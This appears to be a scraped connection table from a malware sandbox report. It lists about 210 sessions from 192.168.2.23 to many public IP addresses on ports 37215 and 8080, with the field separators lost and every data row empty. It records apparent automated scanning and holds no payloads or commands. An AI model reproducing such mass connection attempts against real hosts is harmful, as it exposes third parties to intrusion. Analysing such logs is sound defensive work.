                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7746192.168.2.2359372197.145.233.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7747192.168.2.2342320197.209.33.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7748192.168.2.235491841.63.195.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7749192.168.2.2334016157.227.28.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7750192.168.2.2338384157.113.2.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7751192.168.2.233552241.7.122.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7752192.168.2.2359560185.52.191.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7753192.168.2.2334720208.29.54.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7754192.168.2.2334700197.142.86.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7755192.168.2.234506266.100.209.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7756192.168.2.2338646197.163.244.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7757192.168.2.2335996207.81.247.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7758192.168.2.235570841.145.165.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7759192.168.2.233582041.228.101.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7760192.168.2.2356068223.167.41.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7761192.168.2.234602841.78.229.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7762192.168.2.2345660197.191.84.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7763192.168.2.233893641.117.38.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7764192.168.2.2337614197.45.132.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7765192.168.2.2350164197.107.113.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7766192.168.2.2356836197.248.111.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7767192.168.2.234478241.36.103.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7768192.168.2.2359524197.234.200.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7769192.168.2.2339038184.99.175.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7770192.168.2.2351514197.197.136.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7771192.168.2.2338218118.172.181.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7772192.168.2.234966641.184.36.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7773192.168.2.234656641.160.111.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7774192.168.2.2333326197.142.195.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7775192.168.2.2337458157.62.247.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7776192.168.2.2337592197.86.116.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7777192.168.2.234516041.153.30.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7778192.168.2.2354070180.232.27.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7779192.168.2.2350630157.136.50.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7780192.168.2.235247441.143.27.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7781192.168.2.234970241.213.73.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7782192.168.2.2356048197.108.226.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7783192.168.2.2360592160.149.124.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7784192.168.2.233916878.252.55.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7785192.168.2.2353246197.198.81.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7786192.168.2.2354072118.134.19.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7787192.168.2.2339516157.217.185.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7788192.168.2.234694841.230.156.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7789192.168.2.2353190197.185.231.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7790192.168.2.2352110157.203.95.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7791192.168.2.235167441.135.188.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7792192.168.2.2336616157.132.134.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7793192.168.2.2340770197.224.7.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7794192.168.2.2337410197.191.227.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7795192.168.2.2356208121.210.133.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7796192.168.2.2340798162.208.57.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7797192.168.2.235407841.77.235.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7798192.168.2.2352004130.149.35.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7799192.168.2.2351422157.234.223.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7800192.168.2.2345180157.56.13.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7801192.168.2.235650041.244.159.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7802192.168.2.2345404104.25.92.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7803192.168.2.235476051.101.54.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7804192.168.2.2357282157.230.139.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7805192.168.2.2345374157.43.254.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7806192.168.2.234144453.53.131.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7807192.168.2.235487441.92.30.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7808192.168.2.2338000157.214.239.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7809192.168.2.2333534197.44.84.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7810192.168.2.2341210157.32.137.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7811192.168.2.2348682157.142.156.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7812192.168.2.234457441.27.87.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7813192.168.2.235475841.12.149.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7814192.168.2.2341206157.160.0.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7815192.168.2.2333472197.156.135.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7816192.168.2.2357926157.59.126.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7817192.168.2.235185651.119.197.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7818192.168.2.2349122157.181.30.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7819192.168.2.2360674197.13.193.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7820192.168.2.2351162103.87.185.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7821192.168.2.234749041.231.137.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7822192.168.2.2357124157.210.184.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7823192.168.2.236096441.118.124.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7824192.168.2.2349490197.132.205.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7825192.168.2.2335948197.210.125.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7826192.168.2.2355150197.234.5.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7827192.168.2.2356458197.73.54.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7828192.168.2.234989841.27.38.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7829192.168.2.235188241.220.3.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7830192.168.2.234529641.50.93.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7831192.168.2.2345582174.10.14.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7832192.168.2.2337022197.217.250.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7833192.168.2.235261841.144.176.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7834192.168.2.2333452197.80.2.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7835192.168.2.235786483.101.222.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7836192.168.2.2359236195.252.250.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7837192.168.2.2349870197.156.21.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7838192.168.2.234935472.64.182.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7839192.168.2.2346706157.105.203.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7840192.168.2.2338670157.24.86.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7841192.168.2.2333520157.222.162.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7842192.168.2.2357352157.113.134.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7843192.168.2.234619032.141.226.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7844192.168.2.236087660.84.234.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7845192.168.2.2333304157.93.94.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7846192.168.2.2359336197.128.217.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7847192.168.2.2348562157.232.199.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7848192.168.2.235934241.239.117.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7849192.168.2.2340860157.74.8.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7850192.168.2.2352308136.202.58.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7851192.168.2.2347402157.26.192.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7852192.168.2.2348382197.219.199.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7853192.168.2.2342864157.164.128.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7854192.168.2.234558041.89.24.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7855192.168.2.2350694197.227.51.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7856192.168.2.2349184197.59.58.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7857192.168.2.2357000157.184.28.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7858192.168.2.2360690157.241.159.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7859192.168.2.2353282124.28.87.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7860192.168.2.2347090197.138.73.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7861192.168.2.234583841.222.184.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7862192.168.2.234028441.183.88.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7863192.168.2.234348441.81.214.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7864192.168.2.2359806210.162.207.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7865192.168.2.234082441.159.87.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7866192.168.2.235293041.16.117.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7867192.168.2.233850025.51.221.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7868192.168.2.2349446149.53.17.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7869192.168.2.2357284117.70.122.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7870192.168.2.2336696157.237.178.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7871192.168.2.2356018197.238.188.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7872192.168.2.2349832197.237.22.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7873192.168.2.2360422197.208.130.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7874192.168.2.2352176197.16.30.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7875192.168.2.2352254197.204.254.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7876192.168.2.2354194157.255.85.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7877192.168.2.2337984197.77.82.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7878192.168.2.2358464197.45.144.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7879192.168.2.2347886120.37.40.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7880192.168.2.234503069.85.153.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7881192.168.2.2352848157.114.34.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7882192.168.2.2349370191.133.120.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7883192.168.2.2346998197.250.2.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7884192.168.2.2339204197.15.214.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7885192.168.2.2354838113.198.213.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7886192.168.2.2345836197.64.203.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7887192.168.2.235262641.157.193.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7888192.168.2.2357212157.57.212.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7889192.168.2.2346976172.96.7.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7890192.168.2.2344526197.122.198.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7891192.168.2.233887641.36.100.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7892192.168.2.234089241.213.116.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7893192.168.2.234448841.174.125.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7894192.168.2.235499241.251.109.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7895192.168.2.2349752140.185.18.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7896192.168.2.233649241.137.100.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7897192.168.2.2336996192.3.172.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7898192.168.2.2354844110.167.198.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7899192.168.2.234572466.90.60.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7900192.168.2.235561447.28.127.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7901192.168.2.2349252133.215.113.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7902192.168.2.234140879.206.172.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7903192.168.2.236012034.22.246.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7904192.168.2.2351578162.243.103.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7905192.168.2.233599450.48.154.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7906192.168.2.233887041.169.173.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7907192.168.2.2360578106.26.108.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7908192.168.2.233483087.33.124.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7909192.168.2.2344782169.99.148.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7910192.168.2.2339994139.220.132.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7911192.168.2.23593002.116.14.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7912192.168.2.2347154108.65.51.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7913192.168.2.2342672157.70.29.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7914192.168.2.23362364.150.126.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7915192.168.2.2346980181.20.218.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7916192.168.2.235133088.54.143.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7917192.168.2.2357610151.217.109.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7918192.168.2.235833898.85.23.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7919192.168.2.234613823.212.242.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7920192.168.2.234799463.22.182.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7921192.168.2.234947672.193.26.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7922192.168.2.234669093.47.213.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7923192.168.2.2341142131.149.95.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7924192.168.2.234670092.106.207.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7925192.168.2.2339480203.238.141.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7926192.168.2.23473442.225.151.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7927192.168.2.233413465.227.86.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7928192.168.2.2334362158.254.100.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7929192.168.2.234761635.135.182.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7930192.168.2.23339088.223.80.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7931192.168.2.23607741.0.36.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7932192.168.2.2360774108.66.187.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7933192.168.2.2338936180.245.40.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7934192.168.2.2343168105.237.140.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7935192.168.2.234180285.54.33.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7936192.168.2.2352980111.28.5.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7937192.168.2.235345490.173.54.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7938192.168.2.2333710180.132.103.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7939192.168.2.2352410176.21.230.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7940192.168.2.2358398151.248.120.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7941192.168.2.2355736129.48.141.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7942192.168.2.233804486.6.101.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7943192.168.2.234673468.191.50.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7944192.168.2.23426364.157.126.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7945192.168.2.2339058103.189.172.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7946192.168.2.2353826129.55.46.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7947192.168.2.234463894.173.150.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7948192.168.2.2346410206.67.135.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7949192.168.2.2347282104.114.190.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7950192.168.2.2339808190.187.255.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7951192.168.2.235259677.66.189.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7952192.168.2.2358296137.28.25.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7953192.168.2.234930252.162.126.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7954192.168.2.234235687.54.195.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7955192.168.2.233996493.106.122.2178080
